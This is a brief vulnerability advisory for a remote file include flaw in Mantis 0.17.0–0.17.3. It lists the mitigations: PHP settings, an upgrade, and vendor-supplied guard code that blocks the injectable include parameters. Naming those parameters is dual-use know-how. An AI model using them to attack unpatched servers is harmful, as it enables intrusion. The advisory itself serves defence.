|
Mantis Configuration Remote File Include Command Execution Vulnerability
Solution: Exploitation of this and other remote file include issues may be limited by disabling both 'allow_url_fopen' and 'register_globals' in the local site PHP configuration. This issue has been addressed in Mantis 0.17.4 and later. The vendor has announced that if an upgrade cannot be applied, the vulnerability can be addressing by inserting the following lines in core_API.php: if ( isset($HTTP_GET_VARS['g_top_include_file']) || isset($HTTP_POST_VARS['g_top_include_file']) || isset($HTTP_COOKIE_VARS['g_top_include_file']) ) { exit; } if ( isset($HTTP_GET_VARS['g_bottom_include_page']) || isset($HTTP_POST_VARS['g_bottom_include_page']) || isset($HTTP_COOKIE_VARS['g_bottom_include_page']) ) { exit; } if ( isset($HTTP_GET_VARS['g_css_include_file']) || isset($HTTP_POST_VARS['g_css_include_file']) || isset($HTTP_COOKIE_VARS['g_css_include_file']) ) { exit; } if ( isset($HTTP_GET_VARS['g_meta_include_file']) || isset($HTTP_POST_VARS['g_meta_include_file']) || isset($HTTP_COOKIE_VARS['g_meta_include_file']) ) { exit; } Mantis Mantis 0.17 .0
Mantis Mantis 0.17.1
Mantis Mantis 0.17.2
Mantis Mantis 0.17.3
|
|
 Privacy Statement |
